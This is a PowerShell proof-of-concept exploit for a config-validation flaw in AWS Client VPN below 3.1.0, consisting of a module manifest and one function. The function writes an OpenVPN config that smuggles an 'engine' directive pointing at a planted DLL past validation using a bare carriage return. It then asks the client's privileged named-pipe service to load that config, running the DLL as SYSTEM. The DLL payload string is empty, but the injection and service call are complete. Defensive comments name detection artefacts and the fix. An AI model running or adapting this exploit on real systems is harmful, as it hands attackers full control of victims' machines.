AWS Client VPN < 3.1.0 OpenVPN config validation flaw can be used to escalate privileges (proof of concept)
<#
Module manifest (.psd1) for the proof of concept. The single exported function lives in the
.psm1 file named in RootModule, which is reproduced below this manifest on the page.
Usage:
Import-Module .\Invoke-ExploitAWSVPNLPE.psd1
Invoke-ExploitAWSVPNLPE
#>
@{
# The function Invoke-ExploitAWSVPNLPE is defined in this module file.
RootModule = 'Invoke-ExploitAWSVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '656e7aa1-797d-42c9-ac70-4d50378f5457'
Author = 'Yorick Koster'
CompanyName = 'Securify B.V.'
Copyright = '(c) Yorick Koster. All rights reserved.'
Description = 'AWS VPN Client exploit module to run cmd.exe with SYSTEM privileges'
# System.ServiceModel provides the WCF types (NetNamedPipeBinding, ChannelFactory) the function
# uses. The two vendor files are loaded from the client's own install directory; presumably they
# are where ACVC.Core.Utils.DateUtils and ACVC.WPF.Service.Wcf.IOvpnProcessRunner come from --
# confirm against the assemblies. Importing the module therefore needs the AWS VPN Client
# installed at the default location, and the import will fail without it.
RequiredAssemblies = @("System.ServiceModel",
"$env:ProgramFiles\Amazon\AWS VPN Client\AWSVPNClient.Core.dll",
"$env:ProgramFiles\Amazon\AWS VPN Client\AWSVPNClient.Service.exe")
# Only the entry point is exported; nothing else is defined in the module file.
FunctionsToExport = @("Invoke-ExploitAWSVPNLPE")
}
Function Invoke-ExploitAWSVPNLPE {
<#
.SYNOPSIS
Proof of concept for the AWS VPN Client (< 3.1.0) OpenVPN config validation flaw named in the
page title: asks the client's privileged service to start OpenVPN with a config this function
writes itself.
.DESCRIPTION
Creates a GUID-named folder under %TEMP%, writes a DLL and three text files into it, calls the
service's IOvpnProcessRunner.Start over a WCF named pipe with the connection and password
files from that folder, waits ten seconds and deletes the folder. Takes no parameters and
returns nothing; every step's return value is discarded.
.NOTES
Everything a defender can observe is visible in the steps below: a new %TEMP%\<GUID>\ folder
holding foo.dll (always 14336 bytes, see the buffer note), acvc-8096.txt, lpe.ovpn and
current_connection.txt; a client on the net.pipe endpoint used below; and the folder being
removed again about ten seconds later. The fix, per the title, is upgrading the client to
3.1.0 or later. The DLL payload is not included on this page (the base64 string is empty).
#>
# Fresh random folder name under the caller's %TEMP%; all artifacts go here.
$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
New-Item -Type Directory -Path $tmpfolder | Out-Null
# create engine payload
# https://bugs.chromium.org/p/project-zero/issues/attachment?aid=226456&signed_aid=FXLb7IFsO5A2ZIlQ8sV8kA==
# As published here the payload is an empty string, so the decode/decompress below yields no
# bytes (or fails) and foo.dll is written zero-filled.
$EncodedCompressedFile = ""
$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
# Fixed 14336-byte buffer. Read's byte count is discarded, so the whole buffer is written
# regardless of how much was actually decompressed -- the file on disk is always 14336 bytes.
$dll = New-Object byte[] 14336
$DeflatedStream.Read($dll, 0, $dll.Length) | Out-Null
$DeflatedStream.Close() | Out-Null
Set-Content -Path "$tmpfolder\foo.dll" -Encoding Byte $dll
# create config files
# Current epoch seconds plus 1e9 (roughly 31 years ahead); written next to the config path in
# current_connection.txt below. Presumably this keeps the service from treating the connection
# record as stale -- TODO confirm against the service's check.
$timestamp = [ACVC.Core.Utils.DateUtils]::SecondsSinceEpoch() + 1000000000
# Password file passed as the second argument to Start; its content is a fixed dummy value.
Set-Content -Path "$tmpfolder\acvc-8096.txt" "password"
# The OpenVPN config. The ca/cert/key blocks are empty. The "verb" line embeds a bare carriage
# return (`r) followed by a second <cert> block that contains an "engine" directive pointing at
# foo.dll in the temp folder (backslashes doubled, presumably for OpenVPN's config parser).
# Presumably the validator and OpenVPN disagree on where that line ends, which is the config
# validation flaw the title refers to -- confirm. An .ovpn with an "engine" directive resolving
# into a user-writable folder is the artifact worth alerting on.
Set-Content -Path "$tmpfolder\lpe.ovpn" "dev tap
client
remote 127.0.0.1 1337
<ca>
</ca>
<cert>
</cert>
<key>
</key>
verb `r<cert>
engine $($tmpfolder.Replace('\', '\\'))\\foo
;</cert>"
# Two lines: the config path, then the timestamp.
Set-Content -Value "$tmpfolder\lpe.ovpn`n$timestamp" -Path "$tmpfolder\current_connection.txt"
# call WCF service
# Named-pipe WCF channel to the client service; the endpoint name below is the one to watch for
# unexpected clients (normally only the client GUI should connect to it).
$binding = New-Object System.ServiceModel.NetNamedPipeBinding
$endpoint = "net.pipe://localhost/com.amazonaws.acvc.wpf/service"
$factory = New-Object System.ServiceModel.ChannelFactory[ACVC.WPF.Service.Wcf.IOvpnProcessRunner]($binding, $endpoint)
$client = $factory.CreateChannel()
# Start(connection file, password file); the service reads lpe.ovpn via the connection file.
$client.Start("$tmpfolder\current_connection.txt", "$tmpfolder\acvc-8096.txt")
$factory.Close()
# clean up
# Fixed ten-second wait before the folder (and the DLL the service may still be using) goes away;
# any error from Remove-Item is not handled.
Start-Sleep 10
Remove-Item $tmpfolder -Force -Recurse
}